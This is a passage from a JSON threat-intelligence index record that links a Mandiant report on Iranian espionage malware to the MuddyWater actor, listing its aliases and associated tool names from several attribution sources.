"MITRE" ], "references": [ "https://www.mandiant.com/resources/telegram-malware-iranian-espionage" ], "report_names": [ "telegram-malware-iranian-espionage" ], "threat_actors": [ { "id": "02e1c2df-8abd-49b1-91d1-61bc733cf96b", "created_at": "2022-10-25T15:50:23.308924Z", "updated_at": "2026-04-10T02:00:05.298591Z", "deleted_at": null, "main_name": "MuddyWater", "aliases": [ "MuddyWater", "Earth Vetala", "Static Kitten", "Seedworm", "TEMP.Zagros", "Mango Sandstorm", "TA450" ], "source_name": "MITRE:MuddyWater", "tools": [ "STARWHALE", "POWERSTATS", "Out1", "PowerSploit", "Small Sieve", "Mori", "Mimikatz", "LaZagne", "PowGoop", "CrackMapExec", "ConnectWise", "SHARPSTATS", "RemoteUtilities", "Koadic" ], "source_id": "MITRE", "reports": null }, { "id": "2ed8d590-defa-4873-b2de-b75c9b30931e", "created_at": "2023-01-06T13:46:38.730137Z", "updated_at": "2026-04-10T02:00:03.08136Z", "deleted_at": null, "main_name": "MuddyWater", "aliases": [ "TEMP.Zagros", "Seedworm", "COBALT ULSTER", "G0069", "ATK51", "Mango Sandstorm", "TA450", "Static Kitten", "Boggy Serpens", "Earth Vetala" ], "source_name": "MISPGALAXY:MuddyWater", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "156b3bc5-14b7-48e1-b19d-23aa17492621", "created_at": "2025-08-07T02:03:24.793494Z", "updated_at": "2026-04-10T02:00:03.634641Z", "deleted_at": null, "main_name": "COBALT ULSTER", "aliases": [ "Boggy Serpens ", "ENT-11 ", "Earth Vetala ", "ITG17 ", "MERCURY ", "Mango Sandstorm ", "MuddyWater ", "STAC 1171 ", "Seedworm ", "Static Kitten ", "TA450 ", "TEMP.Zagros ", "UNC3313 ", "Yellow Nix " ], "source_name": "Secureworks:COBALT ULSTER", "tools": [ "CrackMapExec", "Empire", "FORELORD", "Koadic", "LaZagne", "Metasploit", "Mimikatz", "Plink", "PowerStats" ], "source_id": "Secureworks", "reports": null }, { "id": "3c430d71-ab2b-4588-820a-42dd6cfc39fb", "created_at": "2022-10-25T16:07:23.880522Z", "updated_at": "2026-04-10T02:00:04.775749Z", "deleted_at": null, "main_name": "MuddyWater", "aliases": [ "ATK 51", "Boggy Serpens", "Cobalt Ulster", "G0069", "ITG17", "Mango Sandstorm", "MuddyWater", "Operation BlackWater", "Operation Earth Vetala", "Operation Quicksand", "Seedworm", "Static Kitten", "T-APT-14", "TA450", "TEMP.Zagros", "Yellow Nix" ], "source_name": "ETDA:MuddyWater", "tools": [ "Agentemis", "BugSleep", "CLOUDSTATS", "ChromeCookiesView", "Cobalt Strike", "CobaltStrike", "CrackMapExec", "DCHSpy", "DELPHSTATS", "EmPyre", "EmpireProject", "FruityC2", "Koadic", "LOLBAS", "LOLBins", "LaZagne", "Living off the Land", "MZCookiesView", "Meterpreter", "Mimikatz", "MuddyC2Go", "MuddyRot", "Mudwater", "POWERSTATS", "PRB-Backdoor", "PhonyC2", "PowGoop", "PowerShell Empire", "PowerSploit", "Powermud", "QUADAGENT", "SHARPSTATS", "SSF", "Secure Socket Funneling", "Shootback", "Smbmap", "Valyria", "chrome-passwords", "cobeacon", "prb_backdoor" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434122, "ts_updated_at": 1775792062, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/503a49981eb14d6378dffa21a0e92728d7e069c2.pdf", "text": "https://archive.orkl.eu/503a49981eb14d6378dffa21a0e92728d7e069c2.txt", "img": "https://archive.orkl.eu/503a49981eb14d6378dffa21a0e92728d7e069c2.jpg" } }